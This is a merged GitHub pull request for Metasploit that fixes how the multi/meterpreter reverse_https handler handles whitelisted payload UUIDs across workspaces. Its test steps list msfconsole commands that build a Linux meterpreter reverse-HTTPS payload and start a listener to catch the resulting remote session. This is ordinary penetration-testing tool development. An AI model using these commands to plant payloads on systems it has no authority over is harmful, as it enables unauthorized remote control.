Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix multi meterpreter_reverse_http handler to not care so much about the workspace. #11887

Merged
merged 1 commit into from May 31, 2019

Conversation

Projects
None yet
3 participants
@brimstone
Copy link
Contributor

commented May 25, 2019

This change fixes the multi/meterpreter_reverse_https payload handler. I didn't find an existing github issue.

Verification

List the steps needed to make sure this thing works

  • Create /certs/certs.pem according to Paranoid Mode:
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.example.com" \
-keyout www.example.com.key \
-out www.example.com.crt
cat www.example.com.key www.example.com.crt > /certs/cert.pem
  • Start msfconsole
  • setg LHOST wlan0 or your network interface name.
  • setg LPORT 443
  • setg PayloadUUIDTracking true
  • setg HandlerSSLCert /certs/cert.pem
  • setg StagerVerifySSLCert true
  • setg IgnoreUnknownPayloads true
  • setg LURI /multi
  • use payload/linux/x64/meterpreter_reverse_https
  • set PayloadUUIDName ParanoidStagedElf64
  • generate -f elf -o /tmp/rev
  • use exploit/multi/handler
  • set PAYLOAD multi/meterpreter/reverse_https
  • set ExitOnSession false
  • exploit -j
  • Run rev on the same host, or another that can reach this host over the LHOST address.
  • Verify A new session is created.
  • Verify msfconsole doesn't bark about ignoring the unknown UUID.

@wvu-r7 wvu-r7 changed the title Fix multi meterpreter_rever_http handler to not care so much about the workspace. Fix multi meterpreter_reverse_http handler to not care so much about the workspace. May 28, 2019

@@ -239,8 +239,7 @@ def setup_handler
lookup_proxy_settings

if datastore['IgnoreUnknownPayloads']
payload_count = framework.db.payloads({workspace: framework.db.workspace}).length
print_status("Handler is ignoring unknown payloads, there are #{payload_count} UUIDs whitelisted")
print_status("Handler is ignoring unknown payloads")

This comment has been minimized.

Copy link
@jmartin-r7

jmartin-r7 May 28, 2019

Contributor

The count offered had some value, it may be worth simply removing workspace scope there as knowing that all payloads are being rejected if none are in the db would be a helpful flag to the user.

This comment has been minimized.

Copy link
@brimstone

brimstone May 28, 2019

Author Contributor

I didn't see a way to lookup all payloads in the database, so I dropped it. It seems like payloads can only be queried by id or uuid. Any tips on how to get all given the available functions?

This comment has been minimized.

Copy link
@busterb

busterb May 30, 2019

Member

For the purpose of the bugfix, I think we might skip this for now.

@jmartin-r7 jmartin-r7 added the msf5 label May 28, 2019

@jmartin-r7 jmartin-r7 merged commit 26eebb9 into rapid7:master May 31, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jmartin-r7 added a commit that referenced this pull request May 31, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.